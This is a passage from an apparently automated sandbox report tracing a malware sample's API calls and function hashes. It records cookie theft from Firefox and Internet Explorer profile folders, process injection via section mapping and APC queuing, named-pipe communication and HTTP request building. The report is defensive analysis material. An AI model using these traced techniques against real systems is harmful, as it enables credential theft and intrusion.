    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
